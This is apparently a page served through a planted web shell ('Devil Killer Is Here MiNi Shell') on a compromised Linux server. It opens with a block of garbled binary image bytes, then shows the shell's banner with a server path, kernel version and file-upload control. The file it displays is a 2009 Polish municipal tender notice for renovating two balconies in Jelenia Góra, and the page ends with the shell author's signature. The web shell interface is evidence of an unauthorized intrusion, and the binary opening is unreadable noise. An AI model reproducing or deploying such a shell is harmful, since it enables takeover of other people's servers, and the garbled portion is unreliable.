JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151500-N-2009.html

<p class="kh_header"><b>Jelenia Góra: remont dwóch balkonów budynku przy ul. Mickiewicza 12 w Jeleniej Górze</b><br>
<b>Numer ogłoszenia: 151500 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej "Południe" w Jeleniej Górze , Plac Piastowski 2A, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 6428200, faks 075 6428201.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont dwóch balkonów budynku przy ul. Mickiewicza 12 w Jeleniej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest remont dwóch balkonów budynku przy ul. Mickiewicza 12 w Jeleniej Górze wpisanego do rejestru zabytków.

CPV: 45 45 30 00 - 7  Roboty remontowe i renowacyjne  

     Szczegółowy zakres robót zawiera załączony projekt budowlany - załącznik nr 5 do SIWZ, 
     oraz przedmiar robót - załącznik nr 6 do SIWZ.
     Przedmiot   zamówienia  należy  wykonać   z   zastosowaniem   materiałów  i   urządzeń
     określonych w dokumentacji technicznej. Użyte w dokumentacji projektowej i przedmiarach
     robót nazwy wyrobów i elementów, które wskazują lub mogłyby kojarzyć się z producentem
     lub firmą nie mają na celu preferowania wyrobu lub materiałów danego producenta lub
     wskazanie na wyrób, materiał lub element, który powinien posiadać cechy - parametry
     techniczne nie gorsze od podanego w projekcie.
     Zamawiający dopuszcza składanie ofert równoważnych z zastosowaniem innych materiałów i
     urządzeń niż opisane znakiem towarowym i/lub nazwą producenta pod warunkiem, że
     zagwarantują one uzyskanie parametrów technicznych i eksploatacyjnych nie gorszych od złożonych
     w dokumentacji.
    Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że
    oferowane przez niego materiały, urządzenia i roboty budowlane spełniają określone przez
    Zamawiającego.
    Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego
    przez Zamawiającego spoczywa na składającym ofertę - załącznik nr 7 do SIWZ.
    W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty, opisujące parametry
    techniczno - jakościowe, wymagane prawem certyfikaty i inne dokumenty, dopuszczające dane
    materiały (wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, że są one
    równoważne (pod rygorem odrzucenia oferty).
    Wymagany okres gwarancji wynosi 5 lat gwarancji i 5 lat rękojmi na wykonany przedmiot
    zamówienia
    Zamawiający po zawarciu umowy udostępni do remontu obiekt dla celu remontu przewidzianego
    dokumentacją techniczną. Wykonawca zobowiązany będzie do prowadzenia robót w ścisłym
    porozumieniu z Zamawiającym, przy zachowaniu zasad obowiązujących przy prowadzeniu robót w
    czynnym obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.39.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ofertę należy zabezpieczyć wniesieniem wadium w wysokości 2.000,00 zł, które należy wnieść przed terminem składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się Wykonawcy którzy :
.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
ustawy nakładają obowiązek posiadania takich uprawnień,
.	znaj duj ą się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust.
l i 2 Ustawy Pzp,
.	posiadają niezbędną wiedzę i doświadczenie tj. wykonali z należytą starannością w
okresie   ostatnich   pięciu   lat   przed   dniem   wszczęcia   postępowania   o   udzielenie
zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co
najmniej jedną robotę budowlaną w obiektach zabytkowych o wartości  min.30.000,00 zł,
.	dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do
wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do
udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia a
mianowicie:
    - kierownik budowy - stwierdzenie przygotowania zawodowego do wykonywania
     samodzielnych funkcji kierownika budowy w specjalności konstrukcyjno - budowlanej oraz
      posiadanie kwalifikacji zgodnych z rozporządzeniem Ministra Kultury z dnia 09 czerwca
     2004 r (Dz. U. Nr 150, póz. 1579), potwierdzonych przez Wojewódzkiego Konserwatora
     Zabytków.
  2. Wykonawcy ubiegający się o zamówienie publiczne muszą złożyć oświadczenie, że spełniają warunki udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. l pkt. l-4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych ,
-	wzór druku oświadczenia stanowi załącznik nr 2 do niniejszej specyfikacji,
( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)
 3. Sposób dokonania oceny spełniania warunków wymaganych od Wykonawcy.
1)	Zamawiający dokonuje oceny spełniania warunków formalnych wymaganych od Wykonawcy oraz prawidłowości treści oferty na podstawie oświadczeń i dokumentów o których mowa w punkcie 9 SIWZ na zasadzie spełnia - nie spełnia.
2)	Nie spełnienie przez Wykonawcę warunków wymaganych skutkować będzie odpowiednio:
a)	wykluczeniem Wykonawcy z postępowania zgodnie z postanowieniami art. 24 ust. l i 2 pzp za nie spełnianie warunków udziału w postępowaniu,
b)	odrzuceniem oferty zgodnie z postanowieniami art. 89 pzp jeżeli oferta: 
    jest niezgodna z ustawą; jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art. 87 ust.2 pkt 3; jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji; zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia; zawiera błędy w obliczeniu ceny; wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki , o której mowa w art.87 ust.2 pkt 3.
4. Wykonawca powinien zadbać, aby treść oświadczeń i dokumentów składanych wraz z ofertą
    jednoznacznie potwierdzała spełnianie każdego z warunków wymaganych przepisami pzp oraz
    postanowieniami treści siwz. Informacje składane w ofercie powinny przedstawiać stan prawny i 
    faktyczny na dzień składania oferty. Wykonawca odpowiada za prawdziwość danych i informacji
    zawartych w oświadczeniach i dokumentach składanych w ofercie oraz kompletność oferty.
5. Zgodnie z art. 92 ust. l pkt 2 i pkt 3 Zamawiający niezwłocznie po wyborze najkorzystniejszej
   oferty zawiadomi Wykonawców którzy złożyli oferty o Wykonawcach, których oferty zostały
   odrzucone, oraz o Wykonawcach, którzy zostali wykluczeni z postępowania o udzielenie
    zamówienia, podając uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć następujące oświadczenia i dokumenty stanowiące ofertę :

1)	Ofertę na formularzu ofertowym, o treści zgodnej z załączonym wzorem formularza,
    szczegółowo wypełnioną i podpisaną wzór: Załącznik nr 1 do SIWZ.

2)	Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień 
    publicznych, wzór: Załącznik nr 2 do SIWZ.

3)	Dokument potwierdzający wpłacenie/wniesienie wadium.
    W przypadku wnoszenia wadium w formie poręczeń, gwarancji bankowej, gwarancji 
    ubezpieczeniowej - należy do oferty załączyć kopię dokumentu .

4)	 Aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony nie wcześniej
niż 6 miesięcy przed upływem terminu składania ofert.

5)  Doświadczenie zawodowe  - posiada doświadczenie zawodowe i w ciągu ostatnich pięciu lat
      wykonał co najmniej jedno zadanie w obiekcie zabytkowym odpowiadające swoim rodzajem
      i wartością oraz daty i miejsca wykonania  - wzór: Załącznik nr 3 do SIWZ. 

6)	Opinie  dotyczące jakości  wykonanych i  odebranych robót  -  wymienionych
w Załączniku nr 3 do SIWZ, wystawione przez zamawiających te roboty.

7)	Potencjał kadrowy - dysponuje kierownikiem budowy - stwierdzenie przygotowania
      zawodowego do wykonywania  samodzielnych funkcji kierownika budowy w specjalności 
       konstrukcyjno - budowlanej oraz   posiadanie kwalifikacji zgodnych z rozporządzeniem Ministra
       Kultury z dnia 09 czerwca 2004 r (Dz. U. Nr 150, póz. 1579), potwierdzonych przez 
       Wojewódzkiego Konserwatora  Zabytków - wzór: Załącznik nr 4 do SIWZ.

8)  Aktualną polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - o wartości ubezpieczenia nie mniejszej niż 50 000,00 zł. Kwotę ubezpieczenia wyrażoną w innej walucie niż PLN ,Zamawiający przeliczy na PLN, przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.
-	 W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli 
        Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.

Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

Nie spełnienie któregokolwiek ze wskazanych warunków udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O ZAMÓWIENIE:
1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać
     warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych
     warunków, zgodnie z zapisami zawartymi w pkt. 9. niniejszej specyfikacji. Ponadto tacy
    Wykonawcy winni spełnić warunek określony w art. 23 ust. 2 Ustawy ustanawiając i wskazując
     Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w 
     postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się aby 
     Pełnomocnikiem był jeden z Wykonawców ubiegających się o udzielenie zamówienia.
2.	Pełnomocnictwo, o którym mowa w pkt.l, musi się znajdować w ofercie wspólnej
     wykonawców.
3.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. Pełnomocnik
    pozostaje w kontakcie z Zamawiającym w toku postępowania ; zwraca się do Zamawiającego z
    wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.
4.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia , których oferta została wybrana, 
     powinni przed zawarciem umowy w sprawie zamówienia publicznego przedłożyć
     Zamawiającemu umowę regulującą ich współpracę (umowę konsorcjum).
5.	Oferta wspólna, składana przez dwóch lub więcej wykonawców powinna spełniać 
     następujące wymagania:
a)	oferta wspólna powinna być sporządzona zgodnie z SIWZ,
b) dokumenty wspólne: oferta cenowa, wykaz wykonanych robót, oświadczenie o spełnieniu warunków udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. l pkt. l-4 Ustawy, oświadczenie o zapoznaniu się z treścią istotnych postanowień umowy, wadium oraz polisę składa Pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną,
6.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie, uznana
za najkorzystniejszą niezwłocznie przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu umowę konsorcjum, zawierającą w swojej treści m.in. następujące postanowienia:
a)	wyznaczenie spośród siebie podmiot (lidera ) upoważnionego do zaciągania
zobowiązań w imieniu wszystkich Wykonawców realizujących Umowę, wystawiania faktur, przyjmowania płatności i przyjmowania poleceń na rzecz i w imieniu wszystkich Wykonawców realizujących wspólnie Umowę,
b) określenie szczegółowo sposobu współdziałania przy wykonywaniu robót,
a)	zadeklarowanie solidarnej odpowiedzialności za realizację przedmiotu zamówienia
b)	określenie terminu obowiązywania umowy, który nie może być krótszy niż okres
obejmujący realizację zamówienia.
7.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgl.jga.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra. Opłata: 10,00 PLN..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 09:00, miejsce: Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com